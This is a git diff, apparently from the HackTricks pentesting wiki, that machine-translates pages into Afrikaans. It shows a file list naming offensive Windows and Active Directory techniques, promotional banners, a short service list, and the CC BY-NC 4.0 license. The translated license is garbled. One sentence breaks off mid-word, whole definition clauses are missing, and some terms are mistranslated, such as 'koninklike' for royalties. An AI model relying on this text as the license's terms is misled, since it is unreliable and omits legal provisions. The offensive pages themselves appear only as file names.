...external-forest-domain-one-way-outbound.md | 74 +- .../external-forest-domain-oneway-inbound.md | 87 +- .../golden-ticket.md | 70 +- .../kerberoast.md | 146 +- .../kerberos-authentication.md | 28 +- .../kerberos-double-hop-problem.md | 102 +- .../active-directory-methodology/laps.md | 77 +- .../over-pass-the-hash-pass-the-key.md | 52 +- .../pass-the-ticket.md | 64 +- .../password-spraying.md | 118 +- .../printers-spooler-service-abuse.md | 104 +- .../printnightmare.md | 26 +- .../privileged-groups-and-token-privileges.md | 236 +- .../rdp-sessions-abuse.md | 76 +- .../resource-based-constrained-delegation.md | 156 +- .../security-descriptors.md | 58 +- .../sid-history-injection.md | 86 +- .../silver-ticket.md | 124 +- .../skeleton-key.md | 54 +- .../unconstrained-delegation.md | 76 +- .../authentication-credentials-uac-and-efs.md | 248 +- windows-hardening/av-bypass.md | 593 ++-- windows-hardening/basic-cmd-for-pentesters.md | 1759 ++++++++++- .../basic-powershell-for-pentesters/README.md | 958 +++++- .../powerview.md | 286 +- .../checklist-windows-privilege-escalation.md | 191 +- windows-hardening/lateral-movement/README.md | 34 +- .../lateral-movement/dcom-exec.md | 117 +- windows-hardening/ntlm/README.md | 321 +- windows-hardening/ntlm/atexec.md | 42 +- .../ntlm/places-to-steal-ntlm-creds.md | 32 +- windows-hardening/ntlm/psexec-and-winexec.md | 60 +- windows-hardening/ntlm/smbexec.md | 60 +- windows-hardening/ntlm/winrm.md | 30 +- windows-hardening/ntlm/wmicexec.md | 112 +- .../stealing-credentials/README.md | 302 +- .../stealing-credentials/WTS-Impersonator.md | 96 +- .../credentials-mimikatz.md | 246 +- .../credentials-protections.md | 113 +- .../README.md | 1442 +++++---- .../access-tokens.md | 85 +- .../acls-dacls-sacls-aces.md | 214 +- ...ectory-permission-over-service-registry.md | 54 +- .../com-hijacking.md | 102 +- .../create-msi-with-wix.md | 60 +- .../dll-hijacking.md | 242 +- ...ritable-sys-path-+dll-hijacking-privesc.md | 96 +- .../dpapi-extracting-passwords.md | 93 +- ...igh-integrity-to-system-with-name-pipes.md | 186 +- .../integrity-levels.md | 120 +- .../juicypotato.md | 136 +- .../leaked-handle-exploitation.md | 972 +++---- .../msi-wrapper.md | 34 +- .../named-pipe-client-impersonation.md | 34 +- .../README.md | 173 +- ...vilege-escalation-with-autorun-binaries.md | 192 +- .../roguepotato-and-printspoofer.md | 95 +- .../sedebug-+-seimpersonate-copy-token.md | 333 ++- .../seimpersonate-from-high-to-system.md | 296 +- .../windows-c-payloads.md | 52 +- .../uac-user-account-control.md | 213 +- 726 files changed, 75997 insertions(+), 65033 deletions(-) diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 252293216..63b22e7f8 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,4 +1,4 @@ -## Attribution -We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone. +## Toewysing +Ons waardeer jou kennis en moedig jou aan om inhoud te deel. Maak asseblief seker dat jy slegs inhoud oplaai wat jy besit of uitdruklike toestemming het van die oorspronklike skrywer om dit te gebruik. Jou respek vir intellektuele eiendomsregte bevorder 'n betroubare en wettige deelomgewing vir almal. -Thank you for contributing to HackTricks! +Dankie dat jy bydra tot HackTricks! diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 8a0fcba10..e5261bf1f 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,53 +1,27 @@ -# 1911 - Pentesting fox +# 1911 - Pentesting vos
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-And more services: +En meer dienste: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-ontdek udp "Ubiquiti Networks-toestel" -dht udp "DHT Nodes" +dht udp "DHT-nodes" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) - -InfluxDB - -![](<.gitbook/assets/image (337).png>) - -![](<.gitbook/assets/image (338).png>) - -![](<.gitbook/assets/image (339).png>) - -![](<.gitbook/assets/image (340).png>) - -![](<.gitbook/assets/image (341).png>) - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) ( diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index cfeec6e71..caf81cda1 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -19,16 +17,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/LICENSE.md b/LICENSE.md index 3ed5e8e8d..0af37d01d 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,204 +1,151 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Creative Commons License
Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on HACK TRICKS by Carlos Polop is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). +Creative Commons License
Kopiereg © Carlos Polop 2021. Behalwe waar anders gespesifiseer (die eksterne inligting wat in die boek gekopieer is, behoort aan die oorspronklike outeurs), is die teks op HACK TRICKS deur Carlos Polop gelisensieer onder die Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). -License: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
-Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/
-Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode
-Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+Lisensie: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
+Mensleesbare Lisensie: https://creativecommons.org/licenses/by-nc/4.0/
+Volledige Regsterme: https://creativecommons.org/licenses/by-nc/4.0/legalcode
+Formattering: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-# creative commons +# kreatiewe gemeenskap # Attribution-NonCommercial 4.0 International -Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible. +Creative Commons Corporation ("Creative Commons") is nie 'n regspraktyk nie en verskaf nie regsadvies of regsdiens nie. Verspreiding van Creative Commons openbare lisensies skep nie 'n regsverhouding tussen regspraktisyn en kliënt of enige ander verhouding nie. Creative Commons maak sy lisensies en verwante inligting beskikbaar "soos dit is". Creative Commons gee geen waarborge met betrekking tot sy lisensies, enige materiaal wat onder die voorwaardes daarvan gelisensieer is, of enige verwante inligting nie. Creative Commons verwerp alle aanspreeklikheid vir skade wat voortspruit uit die gebruik daarvan tot die volle omvang moontlik. -## Using Creative Commons Public Licenses +## Gebruik van Creative Commons Openbare Lisensies -Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses. +Creative Commons openbare lisensies bied 'n standaardstel voorwaardes wat skeppers en ander reghebbendes kan gebruik om oorspronklike werke van outeurskap en ander materiaal wat onderhewig is aan kopiereg en sekere ander regte soos gespesifiseer in die openbare lisensie hieronder, te deel. Die volgende oorwegings is slegs vir inligtingsdoeleindes, is nie uitputtend nie, en vorm nie deel van ons lisensies nie. -* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +* __Oorwegings vir lisensiegevers:__ Ons openbare lisensies is bedoel vir gebruik deur diegene wat gemagtig is om die publiek toestemming te gee om materiaal op maniere te gebruik wat andersins deur kopiereg en sekere ander regte beperk word. Ons lisensies is onherroeplik. Lisensiegevers moet die terme en voorwaardes van die lisensie wat hulle kies, lees en verstaan voordat hulle dit toepas. Lisensiegevers moet ook alle regte verseker voordat hulle ons lisensies toepas, sodat die publiek die materiaal kan hergebruik soos verwag. Lisensiegevers moet enige materiaal wat nie onderhewig is aan die lisensie nie, duidelik merk. Dit sluit ander CC-gelisensieerde materiaal in, of materiaal wat onder 'n uitsondering of beperking tot kopiereg gebruik word. [Meer oorwegings vir lisensiegevers](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +* __Oorwegings vir die publiek:__ Deur een van ons openbare lisensies te gebruik, gee 'n lisensiegever die publiek toestemming om die gelisensieerde materiaal te gebruik onder gespesifiseerde terme en voorwaardes. As die toestemming van die lisensiegever nie nodig is om enige rede nie – byvoorbeeld as gevolg van enige toepaslike uitsondering of beperking tot kopiereg – word daardie gebruik nie deur die lisensie gereguleer nie. Ons lisensies verleen slegs toestemmings onder kopiereg en sekere ander regte waaroor 'n lisensiegever magtig is om toestemming te gee. Die gebruik van die gelisensieerde materiaal kan nog steeds beperk word om ander redes, insluitend omdat ander kopiereg of ander regte in die materiaal het. 'n Lisensiegever mag spesiale versoeke maak, soos om te vra dat alle veranderinge gemerk of beskryf word. Alhoewel dit nie deur ons lisensies vereis word nie, word jy aangemoedig om daardie versoeke te respekteer waar dit redelik is. [Meer oorwegings vir die publiek](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). -# Creative Commons Attribution-NonCommercial 4.0 International Public License +# Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie -By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. +Deur die Gelisensieerde Regte (hieronder gedefinieer) uit te oefen, aanvaar en stem jy in om gebonde te wees aan die terme en voorwaardes van hierdie Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie ("Openbare Lisensie"). Vir sover hierdie Openbare Lisensie as 'n kontrak geïnterpreteer kan word, word die Gelisensieerde Regte aan jou verleen in oorweging van jou aanvaarding van hierdie terme en voorwaardes, en die Lisensiegever verleen jou sulke regte in oorweging van die voordele wat die Lisensiegever ontvang deur die Gelisensieerde Materiaal beskikbaar te stel onder hierdie terme en voorwaardes. -## Section 1 – Definitions. +## Artikel 1 – Definisies. -a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image. +a. __Aangepaste Materiaal__ beteken materiaal wat onderhewig is aan Kopiereg en Soortgelyke Regte en wat afgelei is van of gebaseer is op die Gelisensieerde Materiaal en waarin die Gelisensieerde Materiaal vertaal, verander, gereël, verander, of andersins gewysig word op 'n wyse wat toestemming vereis onder die Kopiereg en Soortgelyke Regte wat deur die Lisensiegever gehou word. Vir doeleindes van hierdie Openbare Lisensie word Aangepaste Materiaal altyd geproduseer waar die Gelisensieerde Materiaal gesinkroniseer word met 'n bewegende beeld. -b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License. +b. __Lisensie van die Aanpasser__ beteken die lisensie wat jy toepas op jou Kopiereg en Soortgelyke Regte in jou bydraes tot Aangepaste Materiaal in ooreenstem +## Artikel 2 - Omvang. -c. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights. +a. ___Lisensieverlening.___ -d. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements. +1. Onderworpe aan die bepalings en voorwaardes van hierdie Openbare Lisensie, verleen die Lisensiehouer hiermee aan U 'n wêreldwye, vry van lisensiefooi, nie-onderlisensieerbare, nie-uitsluitlike, onherroeplike lisensie om die Gelisensieerde Regte in die Gelisensieerde Materiaal uit te oefen om: -e. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material. +A. die Gelisensieerde Materiaal, geheel of gedeeltelik, vir nie-kommersiële doeleindes slegs te verveelvoudig en te deel; en -f. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License. +B. Aangepaste Materiaal te produseer, te verveelvoudig en te deel vir nie-kommersiële doeleindes slegs. -g. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license. +2. __Uitsonderings en Beperkings.__ Vir die vermyding van twyfel, waar Uitsonderings en Beperkings van toepassing is op U gebruik, is hierdie Openbare Lisensie nie van toepassing nie, en U hoef nie aan sy bepalings en voorwaardes te voldoen nie. -h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License. +3. __Termyn.__ Die termyn van hierdie Openbare Lisensie word gespesifiseer in Artikel 6(a). -i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange. +4. __Media en formate; tegniese wysigings toegelaat.__ Die Lisensiehouer gee U toestemming om die Gelisensieerde Regte in alle media en formate uit te oefen, hetsy nou bekend of hierna geskep, en om tegniese wysigings te maak wat nodig is om dit te doen. Die Lisensiehouer doen afstand van en/of stem daarmee saam om enige reg of gesag te ontken om U te verbied om tegniese wysigings te maak wat nodig is om die Gelisensieerde Regte uit te oefen, insluitend tegniese wysigings wat nodig is om Effektiewe Tegnologiese Maatreëls te omseil. Vir doeleindes van hierdie Openbare Lisensie, produseer die eenvoudige maak van wysigings wat deur hierdie Artikel 2(a)(4) gemagtig word nooit Aangepaste Materiaal nie. -j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them. +5. __Ontvangers van stroomaf.__ -k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world. +A. __Aanbod van die Lisensiehouer - Gelisensieerde Materiaal.__ Elke ontvanger van die Gelisensieerde Materiaal ontvang outomaties 'n aanbod van die Lisensiehouer om die Gelisensieerde Regte uit te oefen onder die bepalings en voorwaardes van hierdie Openbare Lisensie. -l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. +B. __Geen stroomafbeperkings nie.__ U mag geen addisionele of verskillende terme of voorwaardes aanbied of opleg op die Gelisensieerde Materiaal nie, as dit die uitoefening van die Gelisensieerde Regte deur enige ontvanger van die Gelisensieerde Materiaal beperk nie. -## Section 2 – Scope. +6. __Geen goedkeuring.__ Niks in hierdie Openbare Lisensie stel of mag beskou word as toestemming om te beweer of te impliseer dat U, of dat U gebruik van die Gelisensieerde Materiaal, verband hou met, of gesponsoreer, ondersteun, of amptelike status verleen deur, die Lisensiehouer of ander persone wat aangewys is om erkenning te ontvang soos voorsien in Artikel 3(a)(1)(A)(i). -a. ___License grant.___ +b. ___Ander regte.___ - 1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to: +1. Morele regte, soos die reg op integriteit, word nie onder hierdie Openbare Lisensie gelisensieer nie, en ook nie publisiteit, privaatheid, en/of ander soortgelyke persoonlikheidsregte nie; egter, vir sover moontlik, doen die Lisensiehouer afstand van en/of stem daarmee saam om enige sulke regte wat deur die Lisensiehouer gehou word, tot die beperkte mate wat nodig is om U in staat te stel om die Gelisensieerde Regte uit te oefen, maar andersins nie. - A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and +2. Patent- en handelsmerkregte word nie onder hierdie Openbare Lisensie gelisensieer nie. - B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only. +3. Vir sover moontlik, doen die Lisensiehouer afstand van enige reg om koninklike te erf van U vir die uitoefening van die Gelisensieerde Regte, hetsy direk of deur 'n inwinninggenootskap onder enige vrywillige of afstanddoenbare statutêre of verpligte lisensiëringskema. In alle ander gevalle behou die Lisensiehouer uitdruklik enige reg voor om sulke koninklike in te samel, insluitend wanneer die Gelisensieerde Materiaal gebruik word vir nie-kommersiële doeleindes nie. - 2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions. - - 3. __Term.__ The term of this Public License is specified in Section 6(a). +## Artikel 3 - Lisensievoorwaardes. - 4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material. - - 5. __Downstream recipients.__ +U uitoefening van die Gelisensieerde Regte is uitdruklik onderhewig aan die volgende voorwaardes. - A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License. +a. ___Toekennings.___ - B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material. +1. As U die Gelisensieerde Materiaal deel (insluitend in gewysigde vorm), moet U: - 6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i). - -b. ___Other rights.___ +A. die volgende behou as dit deur die Lisensiehouer saam met die Gelisensieerde Materiaal voorsien word: - 1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise. +i. identifikasie van die skepper(s) van die Gelisensieerde Materiaal en enige ander persone wat aangewys is om erkenning te ontvang, op enige redelike wyse wat deur die Lisensiehouer versoek word (insluitend deur skuilnaam as dit aangewys word); - 2. Patent and trademark rights are not licensed under this Public License. +ii. 'n kopieregkennisgewing; - 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes. - -## Section 3 – License Conditions. +iii. 'n kennisgewing wat na hierdie Openbare Lisensie verwys; -Your exercise of the Licensed Rights is expressly made subject to the following conditions. +iv. 'n kennisgewing wat na die vrywaring van waarborge verwys; -a. ___Attribution.___ +v. 'n URI of skakel na die Gelisensieerde Materiaal, vir sover dit redelik uitvoerbaar is; - 1. If You Share the Licensed Material (including in modified form), You must: +B. aandui of U die Gelisensieerde Materiaal gewysig het en 'n aanduiding van enige vorige wysigings behou; en - A. retain the following if it is supplied by the Licensor with the Licensed Material: +C. aandui dat die Gelisensieerde Materiaal gelisensieer is onder hierdie Openbare Lisensie, en die teks van, of die URI of skakel na, hierdie Openbare Lisensie insluit. - i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated); +2. U kan aan die voorwaardes in Artikel 3(a)(1) 